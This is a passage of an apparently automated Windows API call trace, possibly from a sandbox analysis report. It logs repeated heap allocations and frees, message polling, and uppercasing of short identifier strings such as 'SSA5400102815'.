RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0266.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0266.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1438 [0266.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0266.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0266.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0266.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aca50 [0266.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0266.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0266.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0266.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0266.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0266.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0266.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0266.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x44ea) returned 0x34a4048 [0266.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0266.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0266.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0266.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0266.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0266.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0266.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0266.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0266.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0266.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0266.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0266.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0266.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0266.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0266.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0266.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0266.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0266.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0266.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0266.306] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0266.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0266.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0266.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0266.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0266.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0266.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0266.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0266.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0266.307] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0266.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0266.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0266.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0266.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0266.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0266.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0266.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0266.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0266.307] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0266.307] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0266.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0266.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0266.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0266.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0266.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0266.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0266.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0266.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0266.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0266.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0266.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0266.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0266.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0266.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0266.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0266.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0266.309] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0266.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0266.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0266.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0266.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0266.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0266.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0266.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0266.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0266.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0266.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0266.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0266.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0266.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0266.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0266.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0266.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0266.310] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0266.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0266.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0266.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0266.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0266.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0266.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0266.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0266.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0266.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0266.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0266.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0266.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0266.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0266.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0266.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0266.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0266.311] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0266.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0266.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0266.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0266.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0266.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0266.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0266.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0266.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0266.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0266.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0266.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0266.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0266.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0266.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0266.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0266.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0266.311] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0266.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0266.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0266.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0266.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0266.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0266.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2060 [0266.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0266.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0266.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2070 [0266.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0266.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0266.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0266.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0266.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0266.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0266.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0266.313] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0266.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0266.313] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0266.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0266.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0266.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f18 [0266.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0266.313] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0266.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0266.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0266.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0266.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0266.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0266.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0266.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0266.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0266.313] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0266.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0266.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0266.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0266.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0266.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0266.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0266.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0266.314] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0266.314] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0266.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0266.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2080 [0266.314] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0266.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0266.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e70 [0266.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0266.315] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0266.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0266.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0266.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0266.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0266.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0266.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0266.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0266.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20a0 [0266.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0266.315] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0266.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0266.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0266.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0266.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0266.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0266.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0266.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0266.316] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0266.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0266.316] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0266.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0266.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0266.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0266.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0266.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0266.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0266.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0266.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0266.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0266.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0266.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0266.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0266.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0266.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0266.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0266.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0266.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0266.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0266.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0266.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0266.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0266.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0266.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0266.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0266.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0266.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0266.317] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.317] HeapFree (in: hHeap=0x25c0000, 